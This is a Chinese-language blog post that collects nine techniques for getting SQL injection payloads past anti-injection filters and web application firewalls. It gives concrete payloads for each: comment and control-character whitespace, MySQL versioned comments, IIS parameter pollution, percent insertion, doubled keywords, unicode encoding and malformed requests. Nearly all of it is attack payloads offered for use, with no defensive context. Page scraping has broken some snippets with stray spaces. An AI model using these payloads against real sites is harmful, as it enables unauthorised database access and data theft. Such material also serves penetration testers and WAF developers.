- A+
所属分类:Seay信息安全博客
显示不全请点击全屏阅读
原文地址:http://bbs.10hst.com/viewthread.php?tid=39&extra=page%3D1
作者:ay暗影
======绕过防注入系统,包括WAF的测试代码=======
方案一、 把测试代码的空格替换成 /**/ 或者+ (注:/**/ 和+ 不要进行url编码)
?
01
02
03
|
如: id = 1 or 1 = 1 id = 1 / * * / or / * * / 1 = 1 id = 1 + or + 1 = 1 |
方案二、把空格替换成非可见字符 %09 %0A %0D %0B
?
01
02
03
04
|
如: id = 1 or 1 = 1 id = 1 % 09 or% 091 = 1 id = 1 % 0 Aor% 0 A 1 = 1 id = 1 % 0 A% 0 Bor% 0 A% 0 B 1 = 1 |
方案三、把关键字用 /*!*/包起来,注,这个方法只适用于mysql数据库的站点
?
01
02
|
如: id = 1 and 1 = 1 id = 1 / * ! and * / 1 = 1 |
方案四、使用参数污染法攻击绕过,注,该方法只适用于webserver是微软的IIS的情况下
?
01
02
|
如: id = 1 union select 1 from admin id = 1 union / * & id = * / select / * & id = * / from / * & id = * / admin |
方案五、使用%绕过,注,该方法只适用于asp/aspx
?
01
02
|
如: id = 1 union select 1 from admin id = 1 un%io%n sel%e%ct 1 fr%o%m ad%m% in |
方案六、使用%23 (明文为#号)和%0A配合使用绕过,注,这个方法只适用于mysql数据库的站点
?
01
02
|
如: id = 1 union select 1 from admin id = 1 % 23 afafasdf% 0 Aunion% 23 afafasdf% 0 Aselect% 23 afafasdf% 0 A 1 % 23 afafasdf% 0 Afrom% 23 afafasdf% 0 Aadmin |
方案七、使用重复关键字绕过
?
01
02
|
如: id = 1 union select 1 from admin id = 1 ununionion seleselectct 1 frofromm admin |
方案八、使用unicode编码绕过
?
01
02
|
如: id = 1 union select 1 from admin id = 1 %u 0075 %u 006 e%u 0069 %u 006 f%u 006 e select 1 %u 0066 %u 0072 %u 006 f%u 006 d admin |
方案九、使用畸形包绕过,只适用于 asp/aspx,详情可以看80sec的站点
?
01
02
03
04
05
06
07
08
|
如 : id = 1 union select 1 from admin GET / test.asp HTTP / 1.1 Host : 172.1 6.1 5.5 0 Content - Type : application / x - www - form - urlencoded Content - Length : 15 t = 3 * / select / * |
以上是我收集的方法,谁还有新的方案,欢迎补充
Tags:
如果您喜欢我的博客,欢迎点击图片定订阅到邮箱 也可以点击链接【订阅到鲜果】
如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡